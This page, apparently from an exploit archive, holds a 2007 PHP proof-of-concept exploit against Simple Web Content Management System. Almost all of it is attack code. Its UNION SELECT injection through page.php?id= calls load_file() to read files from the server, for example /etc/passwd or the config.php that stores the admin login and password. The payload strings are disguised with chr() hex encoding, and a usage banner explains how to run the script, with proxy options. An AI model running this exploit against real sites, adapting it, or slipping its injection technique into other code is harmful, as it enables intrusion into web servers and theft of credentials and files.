Home / exploitsPDF  

swcms.php.txt

Posted on 04 January 2007

#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); if($argc < 3) { print(" -------------------------------------------------------- Affected.scr..: Simple Web Content Management System Poc.ID........: 18070102 Type..........: SQL Injection Risk.level....: Medium Src.download..: www.cms-center.com Poc.link......: acid-root.new.fr/poc/18070102.txt Credits.......: DarkFig -------------------------------------------------------- Usage.........: php xpl.txt <url> <file> Options.......: <proxhost:proxport> <proxuser:proxpass> Example.......: php xpl.txt http://hihi.org/ /etc/passwd -------------------------------------------------------- "); exit(1); } $url =$argv[1];$file =$argv[2]; $proxh=$argv[3];$proxa=$argv[4]; $xpl = new phpsploit(); $xpl->agent("Mozilla"); if($proxh) $xpl->proxy($proxh); if($proxa) $xpl->proxyauth($proxa); /* * $id = $_GET['id']; * $query = "SELECT * from content WHERE id = $id"; * ... * @return $row->text; * * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on). * What we want is not in the database, it's in a file (config.php): * * //this are the logins for the admin part. Change them for security. * $login = "test"; //your login for the admin section. * $pass = "1234"; //your login for the admin section. * * PS: Les chr() ont été utilisés dans le but de se foutre de * la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =). * */ $header = chr(0x2f).chr(0x3c).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3e).chr(0x0d). chr(0x0a).chr(0x3c).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d). chr(0x0a).chr(0x3c).chr(0x74).chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e). chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x66). chr(0x72).chr(0x61).chr(0x6d).chr(0x65).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x74). chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c). chr(0x6c).chr(0x69).chr(0x6e).chr(0x6b).chr(0x20).chr(0x68).chr(0x72).chr(0x65). chr(0x66).chr(0x3d).chr(0x22).chr(0x5c).chr(0x2f).chr(0x73).chr(0x74).chr(0x79). chr(0x6c).chr(0x65).chr(0x2e).chr(0x63).chr(0x73).chr(0x73).chr(0x22).chr(0x20). chr(0x72).chr(0x65).chr(0x6c).chr(0x3d).chr(0x22).chr(0x73).chr(0x74).chr(0x79). chr(0x6c).chr(0x65).chr(0x73).chr(0x68).chr(0x65).chr(0x65).chr(0x74).chr(0x22). chr(0x20).chr(0x74).chr(0x79).chr(0x70).chr(0x65).chr(0x3d).chr(0x22).chr(0x74). chr(0x65).chr(0x78).chr(0x74).chr(0x5c).chr(0x2f).chr(0x63).chr(0x73).chr(0x73). chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x6d).chr(0x65).chr(0x74). chr(0x61).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x2d).chr(0x65). chr(0x71).chr(0x75).chr(0x69).chr(0x76).chr(0x3d).chr(0x22).chr(0x43).chr(0x6f). chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x2d).chr(0x54).chr(0x79). chr(0x70).chr(0x65).chr(0x22).chr(0x20).chr(0x63).chr(0x6f).chr(0x6e).chr(0x74). chr(0x65).chr(0x6e).chr(0x74).chr(0x3d).chr(0x22).chr(0x74).chr(0x65).chr(0x78). chr(0x74).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3b). chr(0x20).chr(0x63).chr(0x68).chr(0x61).chr(0x72).chr(0x73).chr(0x65).chr(0x74). chr(0x3d).chr(0x69).chr(0x73).chr(0x6f).chr(0x2d).chr(0x38).chr(0x38).chr(0x35). chr(0x39).chr(0x2d).chr(0x31).chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c). chr(0x5c).chr(0x2f).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d). chr(0x0a).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x62).chr(0x6f).chr(0x64).chr(0x79). chr(0x3e).chr(0x2f); $sql = chr(0x70).chr(0x61).chr(0x67).chr(0x65).chr(0x2e).chr(0x70).chr(0x68).chr(0x70). chr(0x3f).chr(0x69).chr(0x64).chr(0x3d).chr(0x2d).chr(0x31).chr(0x2f).chr(0x2a). chr(0x2a).chr(0x2f).chr(0x75).chr(0x6e).chr(0x69).chr(0x6f).chr(0x6e).chr(0x2f). chr(0x2a).chr(0x2a).chr(0x2f).chr(0x73).chr(0x65).chr(0x6c).chr(0x65).chr(0x63). chr(0x74).chr(0x2f).chr(0x2a).chr(0x2a).chr(0x2f).chr(0x6e).chr(0x75).chr(0x6c). chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e). chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c). chr(0x2c).chr(0x6c).chr(0x6f).chr(0x61).chr(0x64).chr(0x5f).chr(0x66).chr(0x69). chr(0x6c).chr(0x65).chr(0x28).chr(0x63).chr(0x6f).chr(0x6e).chr(0x63).chr(0x61). chr(0x74).chr(0x28).concatcharfu($file).chr(0x29).chr(0x29).chr(0x2c).chr(0x6e). chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c). chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c); $footer = chr(0x2f).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x62).chr(0x6f).chr(0x64).chr(0x79). chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74). chr(0x6d).chr(0x6c).chr(0x3e).chr(0x2f); $xpl->get($url.$sql); $ct = preg_replace($footer,'',$xpl->getcontent()); print preg_replace($header,'',$ct); function concatcharfu($file) { $dat = ''; for($i=0;$i<strlen($file);$i++) { $dat .= 'char('.ord($file[$i]).')'; if($i != (strlen($file)-1)) $dat .= ','; } return $dat; } ?>

 

TOP